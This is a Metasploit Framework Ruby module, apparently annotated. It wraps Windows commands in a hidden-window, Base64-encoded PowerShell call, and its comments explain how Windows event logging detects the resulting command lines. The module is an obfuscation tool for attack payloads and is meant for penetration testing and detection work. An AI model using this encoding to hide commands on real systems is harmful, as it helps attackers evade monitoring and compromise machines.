rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/encoders/cmd/powershell_base64.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
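# Command encoder that wraps a Windows command in a Base64-encoded PowerShell
# invocation.
#
# Detection note: every command produced by #encode_buf starts with the literal
# prefix `powershell -w hidden -nop -e `. Process-creation auditing that records
# command lines (Windows event 4688, Sysmon event 1) captures that string as-is,
# and PowerShell script block logging (event 4104) records the decoded script.
class MetasploitModule < Msf::Encoder
  Rank = ExcellentRanking

  include Msf::Post::Windows

  # Registers the module metadata: a command-architecture encoder for Windows.
  def initialize
    super(
      'Name' => 'Powershell Base64 Command Encoder',
      'Description' => %q{
        This encodes the command as a base64 encoded command for powershell.
      },
      'Author' => 'Ben Campbell',
      'Arch' => ARCH_CMD,
      'Platform' => 'win')
  end

  #
  # Encodes the payload
  #
  # Returns +buf+ untouched when there are no bad characters to avoid, and also
  # when '-' or ' ' is a bad character: the wrapper built by #encode_buf
  # contains both, so it cannot satisfy that restriction. Otherwise returns the
  # wrapped command line. When '=' is a bad character, trailing spaces are
  # appended to the command until the Base64 text carries no '=' padding.
  #
  # @param state [Object] encoder state; only +state.badchars+ is read here
  # @param buf [String] the command to wrap
  # @return [String] +buf+ itself, or the PowerShell command line
  def encode_block(state, buf)
    badchars = state.badchars

    # Skip encoding for empty badchars
    return buf if badchars.empty?
    return buf if badchars.include?('-') || badchars.include?(' ')

    cmd = encode_buf(buf)
    return cmd unless badchars.include?('=')

    # Pad a private copy. Appending to +buf+ directly would modify the caller's
    # string in place and raise FrozenError if that string is frozen.
    padded = buf.dup
    while cmd.include?('=')
      padded << ' '
      cmd = encode_buf(padded)
    end

    cmd
  end

  # Builds the command line for +buf+.
  #
  # +buf+ is escaped with Msf::Post::Windows.escape_powershell_literal, placed
  # inside `cmd.exe /c '...'`, converted with Rex::Text.to_unicode (UTF-16LE by
  # default, the form PowerShell's -e / -EncodedCommand option decodes) and
  # Base64-encoded.
  #
  # @param buf [String] the command to wrap
  # @return [String] `powershell -w hidden -nop -e <base64>`
  def encode_buf(buf)
    literal = Msf::Post::Windows.escape_powershell_literal(buf)
    base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c '#{literal}'"))
    "powershell -w hidden -nop -e #{base64}"
  end
end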